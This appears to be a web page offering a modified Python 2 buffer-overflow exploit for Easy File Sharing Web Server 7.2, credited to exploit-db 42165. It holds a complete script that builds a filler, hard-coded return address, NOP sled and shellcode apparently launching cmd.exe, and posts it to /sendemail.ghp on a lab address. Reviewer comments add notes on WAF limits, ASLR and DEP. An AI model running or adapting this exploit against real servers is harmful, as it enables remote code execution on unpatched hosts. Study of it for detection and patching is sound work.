Easy File Sharing Web Server 7.2 BoF (buffer overflow) – ESP

Original code: https://www.exploit-db.com/exploits/42165/

Modified.

#!/usr/bin/env python
# Proof-of-concept for the Easy File Sharing Web Server 7.2 buffer overflow
# (the page cites exploit-db 42165 as the original). The script builds one
# oversized form value, sends it in a single POST to /sendemail.ghp and
# exits. It never checks whether the target is vulnerable or what happened.
#
# Python 2 only: httplib was renamed http.client in Python 3, and the
# payload below relies on Python 2 str being a byte string.
#
# Defender notes (review):
#  - On the wire this is a POST to /sendemail.ghp whose "Email" field is
#    over 4 KB and carries non-printable bytes, including a run of 0x90.
#    A length/charset limit on that field at a proxy or WAF, or an alert
#    on oversized bodies for this path, covers what this script sends.
#  - Both addresses used below are hard-coded absolute values, so the PoC
#    depends on a predictable memory layout and on the payload region
#    being executable. ASLR and DEP target exactly those assumptions --
#    TODO confirm how the affected binary and host are configured.

import httplib

##################################

# Raw x86 machine code placed at the tail of the payload. The bytes include
# the ASCII fragments "exe/" and "cmd." and end with a call through a
# hard-coded absolute address (bytes c7 93 c2 77, little-endian 0x77c293c7).
# NOTE(review): presumably a library routine on one specific Windows build
# used to start cmd.exe -- not verifiable from this file.
shellcode = ("\x8b\xec\x55\x8b\xec\x68\x65\x78\x65"
             "\x2F\x68\x63\x6d\x64\x2e\x8d\x45\xf8"
             "\x50\xb8\xc7\x93\xc2\x77\xff\xd0")

# Filler: 4072 bytes of "A". Presumably the distance from the start of the
# Email buffer to the control data being overwritten -- the offset is
# build-specific; confirm against the original advisory.
junk = "A" * 4072
# 4-byte little-endian value 0x01AE71D4 written directly after the filler.
# The author names it "esp"; NOTE(review): looks like a fixed stack address
# used as the redirected control value, so it only holds where the stack
# location is not randomized.
esp = "\xD4\x71\xAE\x01"
# 12 bytes of 0x90 (x86 NOP) as padding between the address and the code.
nop = "\x90" * 12
# Final payload order: filler, address, NOP padding, machine code.
# (The trailing semicolon is legal Python and has no effect.)
bof = junk + esp + nop + shellcode;

# Target is a hard-coded private (RFC 1918) address on plain HTTP port 80,
# i.e. a lab host chosen by the author.
httpServ = httplib.HTTPConnection("192.168.136.129", 80)
httpServ.connect()

# The payload is formatted into the body as the "Email" form field, raw and
# not URL-encoded; no headers (e.g. Content-Type) are passed explicitly.
httpServ.request('POST', '/sendemail.ghp',
'Email=%s&getPassword=Get+Password' % bof)
 
# The response is fetched but never inspected, so the script gives no
# indication of success or failure.
response = httpServ.getresponse()
 
 
httpServ.close()

fsesp